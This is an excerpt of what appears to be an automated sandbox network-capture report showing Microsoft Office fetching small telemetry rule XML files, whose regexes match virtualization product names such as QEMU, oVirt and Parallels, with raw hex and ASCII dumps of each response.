                                  2024-11-12 15:42:14 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  66192.168.2.44982113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:13 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:13 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 468
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                  ETag: "0x8DC582BB3EAF226"
                                  x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154213Z-16547b76f7f9rdn9hC1DFWfk7s0000000fqg00000000p8yv
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:13 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  67192.168.2.44982213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:13 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:13 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 411
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                  ETag: "0x8DC582B989AF051"
                                  x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154213Z-16547b76f7f76p6chC1DFWctqw0000000fyg00000000b44g
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:13 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  68192.168.2.44981913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:13 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:14 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:14 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                  ETag: "0x8DC582BB650C2EC"
                                  x-ms-request-id: 28b142bf-301e-0000-3ca7-34eecc000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154214Z-15869dbbcc6sg5zbhC1DFWy5u800000007v0000000005ze9
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  69192.168.2.44982413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:14 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:14 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:14 GMT
                                  Content-Type: text/xml
                                  Content-Length: 427
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                  ETag: "0x8DC582BB556A907"
                                  x-ms-request-id: d980b71d-401e-000a-13a8-344a7b000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154214Z-15869dbbcc6x4rp4hC1DFW5xa8000000014g00000000d9e4
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  70192.168.2.44982313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:14 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:14 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:14 GMT
                                  Content-Type: text/xml
                                  Content-Length: 470
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                  ETag: "0x8DC582BBB181F65"
                                  x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154214Z-16547b76f7f2g4rlhC1DFWnx880000000fu0000000004sdy
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:14 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  71192.168.2.44982513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:14 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:15 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 502
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                  ETag: "0x8DC582BB6A0D312"
                                  x-ms-request-id: 5c63e9b4-901e-0067-65a3-34b5cb000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154214Z-15869dbbcc6kg5mvhC1DFW39vn00000006b00000000041yx
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:15 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  72192.168.2.44982613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:15 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:15 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 407
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                  ETag: "0x8DC582B9D30478D"
                                  x-ms-request-id: 71d80149-801e-0083-3cb0-34f0ae000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154215Z-15869dbbcc6lxrkghC1DFWbkxg00000000kg000000001vhp
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  73192.168.2.44982713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:15 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:15 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 474
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                  ETag: "0x8DC582BB3F48DAE"
                                  x-ms-request-id: 5267c52a-501e-007b-64a0-345ba2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154215Z-17df447cdb5l865xhC1DFW9n7g000000096g000000000dzc
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:15 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  74192.168.2.44982813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:15 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:15 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 408
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                  ETag: "0x8DC582BB9B6040B"
                                  x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154215Z-16547b76f7fm7xw6hC1DFW5px40000000fr000000000ftf8
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:15 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  75192.168.2.44982913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:15 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:16 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:16 GMT
                                  Content-Type: text/xml
                                  Content-Length: 469
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                  ETag: "0x8DC582BB3CAEBB8"
                                  x-ms-request-id: 50e8b97d-601e-0070-17a0-34a0c9000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154216Z-17df447cdb5wrr5fhC1DFWte8n0000000cug000000000f05
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:16 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  76192.168.2.44983013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:16 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:16 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:16 GMT
                                  Content-Type: text/xml
                                  Content-Length: 416
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                  ETag: "0x8DC582BB5284CCE"
                                  x-ms-request-id: ea775dbe-901e-0016-4f03-2defe9000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154216Z-16547b76f7fr4g8xhC1DFW9cqc0000000ewg00000000qmbk
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
